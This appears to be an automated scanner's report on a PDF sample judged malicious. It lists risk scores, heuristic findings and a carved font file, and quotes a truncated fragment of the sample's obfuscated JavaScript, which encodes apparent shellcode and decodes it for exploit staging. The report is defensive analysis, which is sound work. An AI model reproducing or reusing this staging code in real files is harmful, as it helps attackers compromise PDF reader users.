MALICIOUS
Risk Score: 114
Machine Learning
- Nyx PDF Classifier malicious score 0.9993
Heuristics 3
- JavaScript action (severity: low; 2 related findings; rule PDF_JAVASCRIPT): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster (severity: critical; rule PDF_JS_EXPLOIT_CLUSTER): PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.

  Matched line in script:

  ```
  var forme1 = "@2deb@8358@04c0@c933@088b@9090@3390@33f6@8bff@83f0@0cc6@fe8b@3366@66d2@168b@d632@1788@c683@8302@01c7@e983@e301@eb17@e8e9@ffce@ffff@9090@9090@f3e5@0003@9090@9090@9090@9090@6c39@57dc@b75b@4fce@7b97@7878@c6ce@8d8d@7777@3b5f@b415@3000@0505@f8f8@a5a5@4dc6@5919@030f@5ad1@7505@263a@63ce@a62d@5a1a@8088@b831@7f3a@22de@6ce7@7bab@43c8@f8ba@2814@77fc@1448@f3f1@7b03@3734@9248@a42d@174a@758d@fa71@e7ac@c6de@e76c@3b60@ccec@eeed@2af0@2a63@fe75@3e0a@e66d@b9ba@4c39@6a96@dd65@1c5b@eb8e@d5a1@7323@9da4@ …
  var asT = String.fromCharCode(37,117);
  var forme2 = forme1.replace(/@/g,asT);
  ```

- Embedded JS stream (severity: low; rule PDF_JS): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| font_00_sfnt_off00001195.bin | pdf-font-stream | PDF embedded font (sfnt) at offset 0x1195 | 192384 bytes |

SHA-256: 3e4aed60bc9e462c84d567e086edabb09be4a4ad6823a0740eaad335e09493af